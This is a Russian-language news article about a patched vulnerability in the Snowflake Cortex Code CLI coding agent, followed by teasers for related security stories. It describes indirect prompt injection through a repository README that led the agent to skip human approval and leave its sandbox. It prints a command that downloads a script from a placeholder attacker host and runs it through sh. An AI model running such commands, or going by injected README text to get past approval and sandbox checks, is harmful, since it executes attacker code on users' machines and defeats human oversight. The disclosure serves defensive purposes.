Уязвимость в Snowflake Cortex Code CLI позволяла обходить песочницу и выполнять вредоносный код

✍️ OpenClawRadar📅 Опубликовано: 19 марта 2026 г.🔗 Source
Уязвимость в Snowflake Cortex Code CLI позволяла обходить песочницу и выполнять вредоносный код
Ad

Детали уязвимости

Snowflake Cortex Code CLI — это командный агент для написания кода, который работает аналогично Claude Code и Codex от OpenAI, со встроенной интеграцией для выполнения SQL в Snowflake. Через два дня после выпуска была обнаружена уязвимость в системе проверки команд Cortex Code, которая позволяла специально сконструированным вредоносным командам выполнять произвольные команды без запуска этапов одобрения человеком и выполнять эти команды вне песочницы Cortex CLI.

Цепочка атаки

Атака работает через косвенную инъекцию промптов. Пользователь открывает Cortex и включает песочницу, затем просит Cortex помочь с сторонней открытой кодовой базой. Инъекция промпта, скрытая в README ненадёжного репозитория, манипулирует Cortex, заставляя его поверить, что необходимо выполнить опасную команду.

Cortex не смог проверить команды внутри выражений подстановки процессов, что позволило выполнить вредоносную команду без одобрения:

cat < <(sh < <(wget -q0- https://ATTACKER_URL.com/bugbot))

Эта команда загружает скрипт с сервера злоумышленника и выполняет его. Обход сработал, потому что:

  • Небезопасные команды внутри выражения подстановки процессов <() не оценивались системой проверки
  • Полная команда начиналась с «безопасной» команды (в данном случае cat)
  • Команды в выражениях подстановки процессов никогда не запускали одобрение человеком
Ad

Обход песочницы

Инъекция промпта также манипулирует моделью, чтобы установить флаг, который запускает выполнение команд вне песочницы. По умолчанию Cortex может установить флаг для запуска выполнения команд вне песочницы, и инъекция использует это, чтобы позволить вредоносной команде выполниться вне песочницы.

Устранение

Команда безопасности Snowflake подтвердила и устранила эту уязвимость, выпустив исправление в Cortex Code CLI версии 1.0.25 28 февраля 2026 года. Полное уведомление Snowflake доступно на сайте сообщества Snowflake по адресу: https://community.snowflake.com/s/article/PromptArmor-Report---Snowflake-Response

Примечание: Эта цепочка атак также применялась к пользователям без песочницы. Документация указывает, что в режиме OS+Regular все команды запрашивают одобрение пользователя. Команды, запущенные в песочнице, также имеют ограничения на доступ к сети и файлам.

📖 Read the full source: HN AI Agents

Ad

👀 Смотрите также

Поддельный сайт Claude Code распространял троян — обнаружен Windows Defender как Trojan:Win32/Kepavll!rfn
Безопасность

Поддельный сайт Claude Code распространял троян — обнаружен Windows Defender как Trojan:Win32/Kepavll!rfn

Мошеннический сайт, копирующий официальный сайт Claude Code, распространял троян, обнаруженный Windows Defender как Trojan:Win32/Kepavll!rfn. Пользователь Reddit предупреждает: проверяйте URL перед запуском команд PowerShell.

OpenClawRadar
Пробел в безопасности OpenClaw устранен спецификацией агентской доверенности (APOA).
Безопасность

Пробел в безопасности OpenClaw устранен спецификацией агентской доверенности (APOA).

Разработчик опубликовал открытую спецификацию под названием Agentic Power of Attorney (APOA), чтобы решить проблемы безопасности в OpenClaw, где агенты в настоящее время получают доступ к таким сервисам, как электронная почта и календарь, имея в качестве ограничений только инструкции на естественном языке. Спецификация предлагает разрешения для каждого сервиса, ограниченный по времени доступ, журналы аудита, отзыв прав и изоляцию учетных данных.

OpenClawRadar
Уязвимость удаленного выполнения кода в приложении Windows Notepad CVE-2026-20841
Безопасность

Уязвимость удаленного выполнения кода в приложении Windows Notepad CVE-2026-20841

CVE-2026-20841 — это уязвимость удаленного выполнения кода в приложении Блокнот Windows. Подробности и рекомендации по смягчению уязвимости доступны в руководстве обновления Центра реагирования на безопасность Microsoft.

OpenClawRadar
Агентский паспорт: Проверка身份 для ИИ-агентов
Безопасность

Агентский паспорт: Проверка身份 для ИИ-агентов

Agent Passport — это открытый слой проверки личности, использующий аутентификацию Ed25519 и токены JWT для ИИ-агентов, который решает проблему impersonating (выдачи себя за другого).

OpenClawRadar